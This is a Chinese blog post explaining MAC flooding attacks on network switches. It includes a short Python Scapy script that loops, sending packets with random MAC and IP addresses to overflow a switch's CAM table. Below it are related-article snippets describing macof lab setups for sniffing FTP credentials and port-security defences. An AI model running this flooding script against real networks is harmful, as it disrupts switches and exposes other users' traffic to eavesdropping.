MAC泛洪攻击

最新推荐文章于 2025-02-27 21:44:19 发布
原创 最新推荐文章于 2025-02-27 21:44:19 发布 · 1.2k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#攻击 mac泛洪

本文介绍了一种网络攻击手段——MAC泛洪攻击,并通过Python脚本详细展示了如何利用Scapy库构造并发送用于MAC泛洪的数据包,进而使交换机的CAM表溢出,导致正常的单播流量被错误地作为广播流量处理。

PC不断发送去往未知目的地的数据帧,且每个包的源MAC地址都不同,当这样的数据包发送的速度足够快之后,快到在刷新时间内将交换机的地址表迅速填满。CAM表被这些伪造的MAC地址占据,真实的MA C地址条目却无法进入CAM表。那么任何一个经过交换机的正常单播数据帧都会以广播帧的形式来处理。 在刷新前不能容纳更多的mac地址池 


尝试用python编写一个攻击脚本

首先用scapy这个模块,这个模块中有RandIP RandMAC两个函数

from scapy.all import *


print RandMAC()

print RandIP(“192.168.0.*”)#指定网段

接下来发送形式如下ARP包

Ether(src=RandMAC(),dst="FF:FF:FF:FF:FF:FF")/ARP(op=2, psrc="0.0.0.0", hwdst="FF:FF:FF:FF:FF:FF")/Padding(load="X"*18))


import sys

from scapy.all import *

import time

 

iface="eth0"

if len(sys.argv)>=2:

    iface=sys.argv[1]

while(1):

    packet= Ether(src=RandMAC("*:*:*:*:*:*"),

                  dst=RandMAC("*:*:*:*:*:*")) / \

    IP(src=RandIP("*.*.*.*"),

    dst=RandIP("*.*.*.*")) / \

    ICMP()

    time.sleep(0.5)

    sendp(packet,iface=iface,loop=0)


HMMPO
关注
MAC地址泛洪攻击以及防御措施
vbknnc的博客
01-24 2461
在kail中打开wireshark,选择eth0端口开始抓包,同时在ensp中client1不断进行登录登出,在wireshark中我们就可以抓到ftp的包,选择一个数据包,打开tcp追踪流,就可以看到用户名和密码了,至此攻击完成。由于交换机的帧交换的大小是有限的,我们采用对交换机发送大量的IP-MAC的信息去占满交换机的帧交换,这样在两台主机通信时信息就会溢出来,从而可以被监听到内容。cloud是用来模拟攻击方的,我们采用kail作为攻击方,因此在网卡方面选择和kali一样的VM8虚拟网卡。
端口安全MAC地址泛洪攻击
最新发布
weixin_42185241的博客
11-05 1077
攻击者利用交换机“学习”MAC地址的机制,向交换机发送海量的、源MAC地址各不相同的伪造数据帧,目的就是填满交换机的MAC地址攻击原理:攻击者(比如连接在交换机的Fa0/24端口)使用工具(如Macof,Yersinia)持续生成大量以太网帧,这些帧的源MAC地址每次都是随机伪造的,但目标MAC地址可以是任意的。交换机收到这些帧后,会忠实地执行学习过程。它会看到来自Fa0/24端口的源MAC地址是... 直到成千上万个。
mac地址泛洪攻击详解
10-21
详解mac地址泛洪攻击。。。。 对大家深入理解交换网络安全有很大帮助
MAC地址泛洪攻击及防护措施实操
w2361734601的博客
02-27 1221
MAC地址泛洪攻击是一种常见的网络攻击手段,通过合理的配置和防护措施,可以有效防止此类攻击对网络的影响。希望本文的实操部分能为你提供有价值的参考,帮助你更好地保护网络的安全。
MAC地址泛洪攻击详细过程及原理
热门推荐
Marsal的博客
07-23 1万+
MAC地址泛洪攻击详细过程及原理 一.交换机的转发数据原理 交换机收到数据帧的时候,先解封装数据链路层,查看这一层的源MAC地址,并且关联自己接收数据的这个接口,把关联MAC地址和接口的信息更新到MAC地址里面 查看这一层的目标MAC地址,然后查询MAC地址,根据目标MAC对应的接口将这个数据转发出去 如果这个时候,MAC地址是空的/丢弃?广播-将这个数据帧进行复制,然后向各个接口转发出去 二.MAC地址泛洪攻击原理 MAC地址有一定的大小,当这个满了的时候,交换机就不能再更新了,也就是不能再
MAC地址泛洪攻击
2303_80370981的博客
01-09 1217
对于使用mac地址泛洪,使用虚拟机kali来抓取计算机传输之间的信息
精选资源
Python程序设计:python mac泛洪攻击.pptx
06-12
**Python MAC泛洪攻击原理与实现** 在网络安全领域,MAC泛洪攻击是一种针对局域网交换机的攻击手法。这种攻击利用了交换机的MAC地址学习和老化机制。交换机通常会记录连接到其各个端口的设备的MAC地址,以便在...
MAC安全(防MAC泛洪攻击
China-P的博客
11-27 4793
2.7 丢弃全0非法MAC地址报文--网络中一些主机或设备发生故障时,会发送源或目的MAC全0报文。2.4 MAC-Spoofing-Defend--一个端口学习的MAC不会再其他端口上学习。2.5 MAC地址防漂移--对于固定的上行设备,通过提供端口优先级,可防止伪造MAC攻击。2.8 MAC地址刷新ARP功能--MAC地址项端口发生变化,及时更新ARP项。2.2 限制MAC地址学习数量--可以防止变化MAC地址攻击(搭配项3配置)1.3 黑洞项:丢弃特定源MAC或目的MAC,不会老化。
MAC泛洪攻击实验
2302_81105681的博客
04-11 360
建立一个客户机和一个服务器,用交换机连接起来。在建立一个cloud连接在交换机上。打开server的ftp服务 client客户端进行登录。设置Client IP地址:192.168.100.4。设置server的IP地址:192.168.100.5。Ping 192.168.100.5 连接成功。Ping 192.168.100.4 连接成功。打开kali 使用macof进行泛洪攻击。打开LSW 查看mac中存在的地址。打开wireshark进行抓包。Sys 进入系统模式。10.劫获到账号密码。
使用macof发起MAC地址泛洪攻击
Bruce_xiaowei的博客
05-04 1880
MAC地址泛洪攻击是一种针对交换机的攻击方式,目的是监听同一局域网中用户的通信数据。交换机的工作核心:端口- MAC地址映射。这张记录了交换机每个端口和与之相连的主机MAC地址之间的对应关系。通常情况下,交换机的每个端口只会连接一台主机,因而在CAM中每个端口只对应一个MAC地址。由于交换机的缓存有限,因此它的CAM中能保存的内容也是有限的。现在交换机都使用级联技术,也就是A交换机可以连接到B交换机的级联端口。这样B交换机的级联端口上就对应多台主机的MAC地址,从而在CAM中产生大量的记录。
MAC泛洪攻击及解决方法
m0_61469678的博客
04-04 1万+
MAC地址泛洪攻击:是攻击者利用了交换机自学习的原理,通过一定手段可以在几秒内生成几十万不同的MAC地址,并发送给交换机,这台交换机的MAC地址很快就被这些伪造的MAC地址占满。当交换机的MAC地址存储达到上限后,再收到数据帧时,一看该目标MAC地址,不在交换机的MAC地址中,就会通过交换机的原理,进行泛洪,这样攻击者就会捕获这些数据帧。
MAC地址泛洪攻击
辉小鱼的博客
11-17 1259
MAC地址泛洪攻击MAC地址泛洪攻击MAC地址泛洪原理简介​MAC(Media Access Control,介质访问控制)地址是识别LAN节点的标识,是传输数据时真正赖以标识发出数据的电脑和接收数据的主机地址。交换机可以识别连在网络上的节点的网卡MAC地址,并把他们放到一个叫做MAC地址的地方。这个MAC地址存放于交换机的缓存中,并记住这些地址。​。
交换机安全 --- Mac地址泛洪攻击
Chen的代码世界
08-04 1124
交换机原理: 数据来到交换机后,交换机先查看数据中的源MAC地址,将源MAC地址和进入接口的信息记录在MAC地址中。如果目标MAC地址存在于MAC地址中,那么就进行单播,否则就会泛洪泛洪:除开数据进入的接口外,将数据转发到其他所有接口。 泛洪范围:单个交换机时,交换机的所有接口处于同一个泛洪范围;多台交换机级联的时候,所有交换机处于同一个泛洪范围。 在MAC地址中,一个接口可以对应多个MAC地址;一个MAC地址只能对应一个接口 为了保证MAC地址的更新性,MAC地址有老化时间 — —.
MAC泛洪攻击的原理实验(非单独完成)
RickTennyson的博客
08-11 941
** 一.MAC泛洪攻击的原理 ** MAC泛洪攻击主要是利用局域网交换机的mac学习和老化机制。 1.交换机的工作流程如下: 局域网中的pc1发送数据帧给pc2,经过交换机时,交换机会在内部mac地址中查找数据帧中的目标mac地址,如果找到就将该数据帧发送到相应的端口,如果找不到,交换机就会向入端口以外的所有端口发送此数据帧(所谓的广播,不过不是广播帧,广播帧的目的mac地址是全F)。 由此可以看到交换机实现交换功能的关键就是内部的mac地址,那这个内部mac地址是怎么形成的呢?有什么特性呢?接下来就
mac泛洪攻击模拟实验
09-23
MAC系统下进行泛洪攻击模拟实验,可参考通用的泛洪攻击实验原理和部分步骤,因为MAC系统属于类Unix系统,在命令使用上有一定通用性。 泛洪攻击利用了交换机的MAC学习机制、MAC项的数据限制和交换机的转发机制。原理是攻击机向交换机发送多个不同MAC地址的数据包,交换机的MAC学习机制会学习收集到的MAC地址,MAC地址满了之后,交换机发数据会以广播的形式,从而也将数据发送给了攻击机[^2]。 ### 实验准备 - **工具**:可使用类似在Kali系统中常用的`macof`工具,MAC系统可通过Homebrew等包管理工具来安装支持泛洪攻击模拟的工具。如果没有`macof`,可考虑使用支持网络数据包伪造和发送的工具。 - **网络环境**:需要搭建网络拓扑,例如使用模拟器(如果有支持MAC系统的模拟器)或真实的网络设备。包含交换机、终端(如Client和Server)等。给Client和Server配置IP地址、子网掩码、网关,如Client的ip为192.168.133.10,子网掩码为255.255.255.0,网关为192.168.133.254;Server的ip为192.168.133.20,子网掩码为255.255.255.0,网关为192.168.133.254 ,并测试连通性,可在Server上ping Client的IP地址 [^2]。 ### 实验步骤 1. **查看交换机初始MAC地址**:在进行攻击前,查看交换机的MAC地址,此时地址数量较少。 2. **配置MAC系统网络**:将MAC系统的网络连接设置为合适的模式,类似Kali的仅主机模式(使用特定网卡)。 3. **发起泛洪攻击**:如果安装了`macof`工具,可在终端输入`macof`命令开始进行泛洪攻击。若使用其他工具,按照其使用说明进行大量伪造MAC地址数据包的发送。 4. **验证攻击结果**:再次查看交换机的MAC地址,若中有很多地址,证明泛洪攻击成功。 ### 泛洪攻击的预防 - 配置静态MAC转发,这样可以固定MAC地址和端口的绑定,防止伪造MAC地址的数据包影响正常转发。 - 配置端口的MAC学习数目限制,限制每个端口可学习的MAC地址数量,避免MAC被大量伪造地址填满 [^2]。 ### 代码示例(假设使用macof) ```bash # 若macof未安装,可参考使用包管理工具安装 # 发起泛洪攻击 macof ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值